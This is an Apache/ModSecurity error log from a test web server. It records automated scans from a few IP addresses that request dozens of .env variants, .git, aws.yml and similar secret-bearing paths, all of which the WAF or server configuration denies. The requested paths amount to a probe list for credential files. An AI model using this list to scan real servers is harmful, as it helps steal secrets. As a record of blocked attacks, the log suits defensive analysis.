[Wed Jul 23 18:17:08.912130 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIELBG6wfjR6tSMvn7_PGAAAAAQ"]
[Wed Jul 23 18:17:08.932447 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGQAAAAQ"]
[Wed Jul 23 18:17:08.932707 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGQAAAAQ"]
[Wed Jul 23 18:17:08.932895 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGQAAAAQ"]
[Wed Jul 23 18:17:08.953165 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGgAAAAQ"]
[Wed Jul 23 18:17:08.953377 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGgAAAAQ"]
[Wed Jul 23 18:17:08.953534 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIELBG6wfjR6tSMvn7_PGgAAAAQ"]
[Wed Jul 23 18:17:08.973650 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIELBG6wfjR6tSMvn7_PGwAAAAQ"]
[Wed Jul 23 18:17:08.973846 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIELBG6wfjR6tSMvn7_PGwAAAAQ"]
[Wed Jul 23 18:17:08.974017 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIELBG6wfjR6tSMvn7_PGwAAAAQ"]
[Wed Jul 23 18:17:08.994183 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIELBG6wfjR6tSMvn7_PHAAAAAQ"]
[Wed Jul 23 18:17:08.994404 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIELBG6wfjR6tSMvn7_PHAAAAAQ"]
[Wed Jul 23 18:17:08.994555 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIELBG6wfjR6tSMvn7_PHAAAAAQ"]
[Wed Jul 23 18:17:09.053642 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIELBW6wfjR6tSMvn7_PHgAAAAQ"]
[Wed Jul 23 18:17:09.053888 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIELBW6wfjR6tSMvn7_PHgAAAAQ"]
[Wed Jul 23 18:17:09.054122 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIELBW6wfjR6tSMvn7_PHgAAAAQ"]
[Wed Jul 23 18:17:09.113281 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIAAAAAQ"]
[Wed Jul 23 18:17:09.113525 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIAAAAAQ"]
[Wed Jul 23 18:17:09.113705 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIAAAAAQ"]
[Wed Jul 23 18:17:09.134213 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIQAAAAQ"]
[Wed Jul 23 18:17:09.134480 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIQAAAAQ"]
[Wed Jul 23 18:17:09.134667 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIQAAAAQ"]
[Wed Jul 23 18:17:09.155651 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIgAAAAQ"]
[Wed Jul 23 18:17:09.155898 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIgAAAAQ"]
[Wed Jul 23 18:17:09.156134 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIgAAAAQ"]
[Wed Jul 23 18:17:09.176515 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIwAAAAQ"]
[Wed Jul 23 18:17:09.176753 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIwAAAAQ"]
[Wed Jul 23 18:17:09.176932 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIELBW6wfjR6tSMvn7_PIwAAAAQ"]
[Wed Jul 23 18:17:09.978137 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jul 23 18:17:10.241426 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Wed Jul 23 18:17:10.610770 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Jul 23 18:17:11.001620 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Jul 23 18:17:11.064760 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jul 23 18:17:12.012785 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Wed Jul 23 18:17:12.072690 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Jul 23 18:17:12.093464 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jul 23 18:17:12.259925 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Jul 23 18:17:12.282335 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Wed Jul 23 18:17:12.341719 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Wed Jul 23 18:17:12.363317 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Wed Jul 23 18:17:12.501868 2025] [authz_core:error] [pid 1405759] [client 185.177.72.107:17630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Thu Jul 24 04:39:36.481246 2025] [authz_core:error] [pid 1416195] [client 185.177.72.144:6366] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 27 09:04:47.416168 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIXPj-WBJAKUjtGl5KHi7QAAABY"]
[Sun Jul 27 09:04:47.417736 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIXPj-WBJAKUjtGl5KHi7QAAABY"]
[Sun Jul 27 09:04:47.417915 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIXPj-WBJAKUjtGl5KHi7QAAABY"]
[Sun Jul 27 09:04:48.133889 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8gAAABY"]
[Sun Jul 27 09:04:48.134117 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8gAAABY"]
[Sun Jul 27 09:04:48.134326 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8gAAABY"]
[Sun Jul 27 09:04:48.156590 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8wAAABY"]
[Sun Jul 27 09:04:48.156805 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8wAAABY"]
[Sun Jul 27 09:04:48.156953 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi8wAAABY"]
